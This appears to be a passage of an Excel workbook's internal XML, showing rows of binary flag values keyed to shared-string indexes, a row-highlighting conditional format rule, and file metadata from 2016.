    <row r="465" spans="1:21" ht="30">
      <c r="A465" s="3" t="s">
        <v>464</v>
      </c>
      <c r="B465" s="1">
        <v>1</v>
      </c>
      <c r="C465" s="14">
        <v>0</v>
      </c>
      <c r="D465" s="5">
        <v>0</v>
      </c>
      <c r="E465" s="5">
        <v>1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1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7">
        <v>1</v>
      </c>
      <c r="U465" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="466" spans="1:21" ht="30">
      <c r="A466" s="3" t="s">
        <v>465</v>
      </c>
      <c r="B466" s="1">
        <v>1</v>
      </c>
      <c r="C466" s="14">
        <v>0</v>
      </c>
      <c r="D466" s="5">
        <v>0</v>
      </c>
      <c r="E466" s="5">
        <v>1</v>
      </c>
      <c r="F466" s="5">
        <v>1</v>
      </c>
      <c r="G466" s="5">
        <v>0</v>
      </c>
      <c r="H466" s="5">
        <v>1</v>
      </c>
      <c r="I466" s="5">
        <v>0</v>
      </c>
      <c r="J466" s="5">
        <v>0</v>
      </c>
      <c r="K466" s="5">
        <v>0</v>
      </c>
      <c r="L466" s="5">
        <v>0</v>
      </c>
      <c r="M466" s="1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7">
        <v>0</v>
      </c>
      <c r="U466" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="467" spans="1:21">
      <c r="A467" s="3" t="s">
        <v>466</v>
      </c>
      <c r="B467" s="1">
        <v>0</v>
      </c>
      <c r="C467" s="14">
        <v>0</v>
      </c>
      <c r="D467" s="5">
        <v>0</v>
      </c>
      <c r="E467" s="5">
        <v>1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</v>
      </c>
      <c r="M467" s="1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7">
        <v>0</v>
      </c>
      <c r="U467" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="468" spans="1:21">
      <c r="A468" s="3" t="s">
        <v>467</v>
      </c>
      <c r="B468" s="1">
        <v>1</v>
      </c>
      <c r="C468" s="14">
        <v>0</v>
      </c>
      <c r="D468" s="5">
        <v>0</v>
      </c>
      <c r="E468" s="5">
        <v>1</v>
      </c>
      <c r="F468" s="5">
        <v>1</v>
      </c>
      <c r="G468" s="5">
        <v>1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1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7">
        <v>0</v>
      </c>
      <c r="U468" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="469" spans="1:21" ht="30">
      <c r="A469" s="3" t="s">
        <v>468</v>
      </c>
      <c r="B469" s="1">
        <v>0</v>
      </c>
      <c r="C469" s="14">
        <v>1</v>
      </c>
      <c r="D469" s="5">
        <v>0</v>
      </c>
      <c r="E469" s="5">
        <v>1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1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7">
        <v>0</v>
      </c>
      <c r="U469" s="1">
        <v>1</v>
      </c>
    </row>
    <row r="470" spans="1:21">
      <c r="A470" s="3" t="s">
        <v>469</v>
      </c>
      <c r="B470" s="1">
        <v>1</v>
      </c>
      <c r="C470" s="1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1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7">
        <v>0</v>
      </c>
      <c r="U470" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="471" spans="1:21">
      <c r="A471" s="3" t="s">
        <v>470</v>
      </c>
      <c r="B471" s="1">
        <v>1</v>
      </c>
      <c r="C471" s="14">
        <v>0</v>
      </c>
      <c r="D471" s="5">
        <v>0</v>
      </c>
      <c r="E471" s="5">
        <v>0</v>
      </c>
      <c r="F471" s="5">
        <v>1</v>
      </c>
      <c r="G471" s="5">
        <v>0</v>
      </c>
      <c r="H471" s="5">
        <v>1</v>
      </c>
      <c r="I471" s="5">
        <v>0</v>
      </c>
      <c r="J471" s="5">
        <v>0</v>
      </c>
      <c r="K471" s="5">
        <v>0</v>
      </c>
      <c r="L471" s="5">
        <v>0</v>
      </c>
      <c r="M471" s="1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7">
        <v>0</v>
      </c>
      <c r="U471" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="472" spans="1:21">
      <c r="A472" s="3" t="s">
        <v>471</v>
      </c>
      <c r="B472" s="1">
        <v>1</v>
      </c>
      <c r="C472" s="1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1</v>
      </c>
      <c r="I472" s="5">
        <v>0</v>
      </c>
      <c r="J472" s="5">
        <v>0</v>
      </c>
      <c r="K472" s="5">
        <v>0</v>
      </c>
      <c r="L472" s="5">
        <v>0</v>
      </c>
      <c r="M472" s="1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7">
        <v>0</v>
      </c>
      <c r="U472" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="473" spans="1:21">
      <c r="A473" s="3" t="s">
        <v>472</v>
      </c>
      <c r="B473" s="1">
        <v>0</v>
      </c>
      <c r="C473" s="1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1</v>
      </c>
      <c r="M473" s="1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7">
        <v>0</v>
      </c>
      <c r="U473" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="474" spans="1:21" ht="30">
      <c r="A474" s="3" t="s">
        <v>473</v>
      </c>
      <c r="B474" s="1">
        <v>0</v>
      </c>
      <c r="C474" s="14">
        <v>1</v>
      </c>
      <c r="D474" s="5">
        <v>0</v>
      </c>
      <c r="E474" s="5">
        <v>1</v>
      </c>
      <c r="F474" s="5">
        <v>1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1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7">
        <v>0</v>
      </c>
      <c r="U474" s="1">
        <v>1</v>
      </c>
    </row>
    <row r="475" spans="1:21">
      <c r="A475" s="3" t="s">
        <v>474</v>
      </c>
      <c r="B475" s="1">
        <v>1</v>
      </c>
      <c r="C475" s="1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1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7">
        <v>0</v>
      </c>
      <c r="U475" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="476" spans="1:21" ht="30">
      <c r="A476" s="3" t="s">
        <v>475</v>
      </c>
      <c r="B476" s="1">
        <v>1</v>
      </c>
      <c r="C476" s="14">
        <v>0</v>
      </c>
      <c r="D476" s="5">
        <v>0</v>
      </c>
      <c r="E476" s="5">
        <v>1</v>
      </c>
      <c r="F476" s="5">
        <v>0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5">
        <v>0</v>
      </c>
      <c r="M476" s="1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7">
        <v>1</v>
      </c>
      <c r="U476" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="477" spans="1:21" ht="30">
      <c r="A477" s="3" t="s">
        <v>476</v>
      </c>
      <c r="B477" s="1">
        <v>1</v>
      </c>
      <c r="C477" s="14">
        <v>0</v>
      </c>
      <c r="D477" s="5">
        <v>0</v>
      </c>
      <c r="E477" s="5">
        <v>1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1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7">
        <v>1</v>
      </c>
      <c r="U477" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="478" spans="1:21">
      <c r="A478" s="3" t="s">
        <v>477</v>
      </c>
      <c r="B478" s="1">
        <v>1</v>
      </c>
      <c r="C478" s="1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1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7">
        <v>0</v>
      </c>
      <c r="U478" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="479" spans="1:21">
      <c r="A479" s="3" t="s">
        <v>478</v>
      </c>
      <c r="B479" s="1">
        <v>1</v>
      </c>
      <c r="C479" s="14">
        <v>0</v>
      </c>
      <c r="D479" s="5">
        <v>0</v>
      </c>
      <c r="E479" s="5">
        <v>0</v>
      </c>
      <c r="F479" s="5">
        <v>1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1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7">
        <v>0</v>
      </c>
      <c r="U479" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="480" spans="1:21">
      <c r="A480" s="3" t="s">
        <v>479</v>
      </c>
      <c r="B480" s="1">
        <v>0</v>
      </c>
      <c r="C480" s="14">
        <v>0</v>
      </c>
      <c r="D480" s="5">
        <v>0</v>
      </c>
      <c r="E480" s="5">
        <v>0</v>
      </c>
      <c r="F480" s="5">
        <v>1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1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7">
        <v>0</v>
      </c>
      <c r="U480" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="481" spans="1:21">
      <c r="A481" s="3" t="s">
        <v>480</v>
      </c>
      <c r="B481" s="1">
        <v>0</v>
      </c>
      <c r="C481" s="14">
        <v>0</v>
      </c>
      <c r="D481" s="5">
        <v>0</v>
      </c>
      <c r="E481" s="5">
        <v>1</v>
      </c>
      <c r="F481" s="5">
        <v>1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1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7">
        <v>0</v>
      </c>
      <c r="U481" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="482" spans="1:21" ht="45">
      <c r="A482" s="3" t="s">
        <v>481</v>
      </c>
      <c r="B482" s="1">
        <v>1</v>
      </c>
      <c r="C482" s="14">
        <v>0</v>
      </c>
      <c r="D482" s="5">
        <v>0</v>
      </c>
      <c r="E482" s="5">
        <v>1</v>
      </c>
      <c r="F482" s="5">
        <v>1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1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7">
        <v>0</v>
      </c>
      <c r="U482" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="483" spans="1:21" ht="30">
      <c r="A483" s="3" t="s">
        <v>482</v>
      </c>
      <c r="B483" s="1">
        <v>1</v>
      </c>
      <c r="C483" s="14">
        <v>0</v>
      </c>
      <c r="D483" s="5">
        <v>0</v>
      </c>
      <c r="E483" s="5">
        <v>1</v>
      </c>
      <c r="F483" s="5">
        <v>0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0</v>
      </c>
      <c r="M483" s="1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7">
        <v>1</v>
      </c>
      <c r="U483" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="484" spans="1:21" ht="30">
      <c r="A484" s="3" t="s">
        <v>483</v>
      </c>
      <c r="B484" s="1">
        <v>1</v>
      </c>
      <c r="C484" s="14">
        <v>0</v>
      </c>
      <c r="D484" s="5">
        <v>0</v>
      </c>
      <c r="E484" s="5">
        <v>1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1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7">
        <v>0</v>
      </c>
      <c r="U484" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="485" spans="1:21" ht="30">
      <c r="A485" s="3" t="s">
        <v>484</v>
      </c>
      <c r="B485" s="1">
        <v>1</v>
      </c>
      <c r="C485" s="1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1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7">
        <v>1</v>
      </c>
      <c r="U485" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="486" spans="1:21">
      <c r="A486" s="3" t="s">
        <v>485</v>
      </c>
      <c r="B486" s="1">
        <v>1</v>
      </c>
      <c r="C486" s="14">
        <v>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1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7">
        <v>0</v>
      </c>
      <c r="U486" s="1">
        <v>1</v>
      </c>
    </row>
    <row r="487" spans="1:21" ht="30">
      <c r="A487" s="3" t="s">
        <v>486</v>
      </c>
      <c r="B487" s="1">
        <v>1</v>
      </c>
      <c r="C487" s="14">
        <v>1</v>
      </c>
      <c r="D487" s="5">
        <v>0</v>
      </c>
      <c r="E487" s="5">
        <v>1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1">
        <v>0</v>
      </c>
      <c r="N487" s="14">
        <v>0</v>
      </c>
      <c r="O487" s="14">
        <v>1</v>
      </c>
      <c r="P487" s="14">
        <v>0</v>
      </c>
      <c r="Q487" s="14">
        <v>0</v>
      </c>
      <c r="R487" s="14">
        <v>0</v>
      </c>
      <c r="S487" s="14">
        <v>0</v>
      </c>
      <c r="T487" s="7">
        <v>0</v>
      </c>
      <c r="U487" s="1">
        <v>1</v>
      </c>
    </row>
    <row r="488" spans="1:21" ht="30">
      <c r="A488" s="3" t="s">
        <v>487</v>
      </c>
      <c r="B488" s="1">
        <v>1</v>
      </c>
      <c r="C488" s="14">
        <v>0</v>
      </c>
      <c r="D488" s="5">
        <v>0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1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7">
        <v>1</v>
      </c>
      <c r="U488" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="489" spans="1:21" ht="30">
      <c r="A489" s="3" t="s">
        <v>488</v>
      </c>
      <c r="B489" s="1">
        <v>1</v>
      </c>
      <c r="C489" s="14">
        <v>0</v>
      </c>
      <c r="D489" s="5">
        <v>0</v>
      </c>
      <c r="E489" s="5">
        <v>1</v>
      </c>
      <c r="F489" s="5">
        <v>1</v>
      </c>
      <c r="G489" s="5">
        <v>0</v>
      </c>
      <c r="H489" s="5">
        <v>1</v>
      </c>
      <c r="I489" s="5">
        <v>0</v>
      </c>
      <c r="J489" s="5">
        <v>0</v>
      </c>
      <c r="K489" s="5">
        <v>0</v>
      </c>
      <c r="L489" s="5">
        <v>0</v>
      </c>
      <c r="M489" s="1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7">
        <v>0</v>
      </c>
      <c r="U489" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="490" spans="1:21" ht="60">
      <c r="A490" s="3" t="s">
        <v>489</v>
      </c>
      <c r="B490" s="1">
        <v>0</v>
      </c>
      <c r="C490" s="14">
        <v>1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1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7">
        <v>0</v>
      </c>
      <c r="U490" s="1">
        <v>1</v>
      </c>
    </row>
    <row r="491" spans="1:21">
      <c r="A491" s="3" t="s">
        <v>490</v>
      </c>
      <c r="B491" s="1">
        <v>0</v>
      </c>
      <c r="C491" s="1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1</v>
      </c>
      <c r="M491" s="1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7">
        <v>0</v>
      </c>
      <c r="U491" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="492" spans="1:21" ht="45">
      <c r="A492" s="3" t="s">
        <v>491</v>
      </c>
      <c r="B492" s="1">
        <v>1</v>
      </c>
      <c r="C492" s="14">
        <v>0</v>
      </c>
      <c r="D492" s="5">
        <v>0</v>
      </c>
      <c r="E492" s="5">
        <v>1</v>
      </c>
      <c r="F492" s="5">
        <v>1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1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7">
        <v>1</v>
      </c>
      <c r="U492" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="493" spans="1:21" ht="30">
      <c r="A493" s="3" t="s">
        <v>492</v>
      </c>
      <c r="B493" s="1">
        <v>1</v>
      </c>
      <c r="C493" s="14">
        <v>1</v>
      </c>
      <c r="D493" s="5">
        <v>0</v>
      </c>
      <c r="E493" s="5">
        <v>1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1">
        <v>0</v>
      </c>
      <c r="N493" s="14">
        <v>0</v>
      </c>
      <c r="O493" s="14">
        <v>0</v>
      </c>
      <c r="P493" s="14">
        <v>1</v>
      </c>
      <c r="Q493" s="14">
        <v>0</v>
      </c>
      <c r="R493" s="14">
        <v>0</v>
      </c>
      <c r="S493" s="14">
        <v>0</v>
      </c>
      <c r="T493" s="7">
        <v>0</v>
      </c>
      <c r="U493" s="1">
        <v>1</v>
      </c>
    </row>
    <row r="494" spans="1:21" ht="30">
      <c r="A494" s="3" t="s">
        <v>493</v>
      </c>
      <c r="B494" s="1">
        <v>1</v>
      </c>
      <c r="C494" s="14">
        <v>0</v>
      </c>
      <c r="D494" s="5">
        <v>0</v>
      </c>
      <c r="E494" s="5">
        <v>1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1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7">
        <v>1</v>
      </c>
      <c r="U494" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="495" spans="1:21" ht="30">
      <c r="A495" s="3" t="s">
        <v>494</v>
      </c>
      <c r="B495" s="1">
        <v>1</v>
      </c>
      <c r="C495" s="1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1</v>
      </c>
      <c r="I495" s="5">
        <v>0</v>
      </c>
      <c r="J495" s="5">
        <v>0</v>
      </c>
      <c r="K495" s="5">
        <v>0</v>
      </c>
      <c r="L495" s="5">
        <v>0</v>
      </c>
      <c r="M495" s="1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7">
        <v>1</v>
      </c>
      <c r="U495" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="496" spans="1:21">
      <c r="A496" s="3" t="s">
        <v>495</v>
      </c>
      <c r="B496" s="1">
        <v>1</v>
      </c>
      <c r="C496" s="1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1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7">
        <v>0</v>
      </c>
      <c r="U496" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="497" spans="1:21" ht="105">
      <c r="A497" s="3" t="s">
        <v>496</v>
      </c>
      <c r="B497" s="1">
        <v>0</v>
      </c>
      <c r="C497" s="1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1</v>
      </c>
      <c r="M497" s="1">
        <v>1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7">
        <v>0</v>
      </c>
      <c r="U497" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="498" spans="1:21" ht="30">
      <c r="A498" s="3" t="s">
        <v>497</v>
      </c>
      <c r="B498" s="1">
        <v>1</v>
      </c>
      <c r="C498" s="14">
        <v>0</v>
      </c>
      <c r="D498" s="5">
        <v>0</v>
      </c>
      <c r="E498" s="5">
        <v>1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1">
        <v>0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7">
        <v>1</v>
      </c>
      <c r="U498" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="499" spans="1:21" ht="30">
      <c r="A499" s="3" t="s">
        <v>498</v>
      </c>
      <c r="B499" s="1">
        <v>1</v>
      </c>
      <c r="C499" s="14">
        <v>0</v>
      </c>
      <c r="D499" s="5">
        <v>0</v>
      </c>
      <c r="E499" s="5">
        <v>0</v>
      </c>
      <c r="F499" s="5">
        <v>1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1">
        <v>0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7">
        <v>1</v>
      </c>
      <c r="U499" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="500" spans="1:21">
      <c r="A500" s="3" t="s">
        <v>499</v>
      </c>
      <c r="B500" s="1">
        <v>0</v>
      </c>
      <c r="C500" s="14">
        <v>0</v>
      </c>
      <c r="D500" s="5">
        <v>0</v>
      </c>
      <c r="E500" s="5">
        <v>0</v>
      </c>
      <c r="F500" s="5">
        <v>1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1">
        <v>0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7">
        <v>0</v>
      </c>
      <c r="U500" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="501" spans="1:21" ht="90">
      <c r="A501" s="3" t="s">
        <v>500</v>
      </c>
      <c r="B501" s="1">
        <v>0</v>
      </c>
      <c r="C501" s="1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1</v>
      </c>
      <c r="M501" s="1">
        <v>1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7">
        <v>0</v>
      </c>
      <c r="U501" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="502" spans="1:21">
      <c r="A502"/>
      <c r="B502"/>
      <c r="D502"/>
      <c r="E502"/>
      <c r="F502"/>
      <c r="G502"/>
      <c r="H502"/>
      <c r="I502"/>
      <c r="J502"/>
      <c r="K502"/>
      <c r="L502"/>
      <c r="N502" s="15"/>
      <c r="O502" s="15"/>
    </row>
    <row r="503" spans="1:21" s="6" customFormat="1">
      <c r="A503" s="12"/>
      <c r="B503" s="5"/>
      <c r="C503" s="15"/>
      <c r="N503" s="16"/>
      <c r="O503" s="16"/>
      <c r="P503" s="15"/>
      <c r="Q503" s="15"/>
      <c r="R503" s="15"/>
      <c r="S503" s="15"/>
      <c r="T503" s="8"/>
    </row>
    <row r="505" spans="1:21">
      <c r="A505" s="12"/>
    </row>
    <row r="507" spans="1:21">
      <c r="A507"/>
      <c r="B507"/>
      <c r="D507"/>
      <c r="E507"/>
      <c r="F507"/>
      <c r="G507"/>
      <c r="H507"/>
      <c r="I507"/>
      <c r="J507"/>
      <c r="K507"/>
      <c r="L507"/>
      <c r="N507" s="15"/>
      <c r="O507" s="15"/>
    </row>
    <row r="508" spans="1:21">
      <c r="A508" s="12"/>
    </row>
  </sheetData>
  <conditionalFormatting sqref="B2">
    <cfRule type="expression" dxfId="1" priority="2">
      <formula>ROW(A2)=ActiveRow</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="A2:XFD501 A503:XFD506 A508:XFD1048576">
    <cfRule type="expression" dxfId="0" priority="1">
      <formula>ROW(A2)=ActiveRow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</dc:creator>
  <cp:lastModifiedBy>kanokporn</cp:lastModifiedBy>
  <dcterms:created xsi:type="dcterms:W3CDTF">2016-06-22T07:43:20Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2016-07-04T13:23:26Z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e88cd2d6-5f54-4ce1-9796-00e706967e4d</vt:lpwstr>
  </property>
</Properties>
</file>